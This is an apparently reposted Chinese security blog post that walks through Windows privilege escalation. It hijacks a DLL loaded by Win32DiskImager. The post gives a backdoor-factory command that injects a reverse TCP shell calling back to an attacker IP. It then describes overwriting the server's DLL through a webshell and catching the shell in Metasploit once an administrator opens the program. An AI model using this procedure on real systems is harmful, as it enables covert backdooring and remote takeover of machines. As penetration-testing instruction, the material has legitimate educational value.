Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

基于DLL劫持配合backdoor-factory的提权思路

$
0
0

作者: suzumiya

0x00

网上有许多 DLL 劫持提权的文章 但是都不是很详细 而且 ws2.dll lpk.dll 一些以前的 dll 也已经被封锁了

自从 windows xp sp2 开始 就加入了这个机制

注册表路径:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode

凡是里面存在的 dll 就必然是劫持不了的。 但是我们却可以注入应用程序中的 dll 来达到提权效果 就用 win32diskimager 这个软件来进行 dll 劫持的例子 0x01 首先用 process Explorer 这个软件来分析 win32diskimager 都调用了哪些 dll 文件
基于DLL劫持配合backdoor-factory的提权思路
就用 icuuc51.dll这个来举例子 可以看到win32diskimager调用软件自带的dll 0x02 接着使用 backdoor-factory 来对这个 dll 进行注入后门 root@saya:~# backdoor-factory -f / file /icuuc51.dll -s reverse_shell_tcp_inline -P <your port> -H <yoour ip>
基于DLL劫持配合backdoor-factory的提权思路
接着选择 2 就完成了后门的生成 [!] Enter your selection: 2 [!] Using selection: 2 [*] Changing flags for section: .data [*] Patching initial entry instructions [*] Creating win32 resume execution stub [*] Looking for and setting selected shellcode File icuuc51.dll is in the ‘backdoored’ directory 工具会提示一个存储的地方 0x03 假设我们在 webshell 提权的情况下 用菜刀把 icuuc51.dll 覆盖掉服务器软件原来的 icuuc51.dll 我这里搭建了一个简陋的 asp 环境
基于DLL劫持配合backdoor-factory的提权思路
接着监听 msf
基于DLL劫持配合backdoor-factory的提权思路
等待管理员打开被劫持的软件的 dll 当管理员打开软件之后 软件没有任何损坏
基于DLL劫持配合backdoor-factory的提权思路
反其看 metasploit 这边已经获得了一个 shell
基于DLL劫持配合backdoor-factory的提权思路
默认 backdoor-factory不是用meterpreter的载荷 用此命令将普通 shell提升为meterpreter s essions -u <id>
基于DLL劫持配合backdoor-factory的提权思路
转载请注明原文地址:suzumiya.me

Viewing all articles
Browse latest Browse all 12749

Trending Articles